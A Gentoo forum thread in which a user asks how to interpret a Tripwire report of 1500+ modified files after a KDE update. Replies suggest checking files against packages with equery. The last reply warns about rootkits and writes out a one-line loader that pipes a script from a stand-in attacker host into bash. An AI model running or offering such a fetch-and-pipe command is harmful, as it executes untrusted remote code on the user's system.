# Understanding tripwire?

## FizzyWidget

After reading a report, it told me there was 1500+ modified files all over the system, not surprising as i had just updated to kde 4.8, but how would i know which files to look at to make sure that if someone managed to get inside my system, i know what or where to look.

SSH is not forwarded from my router, no port is, and anytime someone needs to connect they are only opened as long as i need them open, ssh is also blocked in iptables, unless you are on the same ip range, root is disabled, port has been changed, and its been told to listen on a single address.

Am I just being too paranoid about security considering that the system is only for home use, and doesn't have any web services running on it? Well none that are available to the outside world anyway.

I know there are other IDS utils out there but this was the one that I was recommended

----------

## FizzyWidget

bump

----------

## wcg

So look at the files in the report. What package do they belong to?

("equery belongs -en /path/to/file")

Are those packages that you updated when you last ran emerge

world?

If you can use some text tool (grep, cut, awk, and so on) to get a

list of just the pathnames from the report, one per line, then

you can have a little loop in a shell script check each one with

"equery b  -en $PATHNAME". (I do not think "equery belongs ..."

handles multiple pathnames in the same command. It simply

returns the query result for the last one.)

Are there any listed that were not part of your emerge?

You have to expect a lot of noise from a program like this

after "emerge system" and "emerge world".

----------

## FizzyWidget

to be honest i cant remember what they were now and i dont have the report's now, don't think anything is amiss, was just wondering for future reference what would be a good way to check  :Smile: 

----------

## joeklow

 *Dark Foo wrote:*   

> to be honest i cant remember what they were now and i dont have the report's now, don't think anything is amiss, was just wondering for future reference what would be a good way to check 

 

* Once a whole dorm room of fellow .deb adepts was empoisoned by perl script which was installed under ordinary user and loaded via xchat/pidgin (back in those days, they allowed to run a plugin without displaying it on a list).

* .bashrc jokes are still popular

* and by the chance, a good rootkit is able to install it in seconds after you emerged something (whenever it has control over terminal window, it just can copy itself over any freshly modified file which is not updated itself intro tripwire db yet)

So, the rule of thumb is: no friends touching your keyboards.

The quickest rootkit loader can be installed in 25 letter long command:

(assuming the attacker owns xxx.me which serve an evil script as indexpage)

```
wget xxx.me -O-|/bin/bash
```

There are other methods to load 'userkits'. Maybe I'll be writing an article about them.

----------

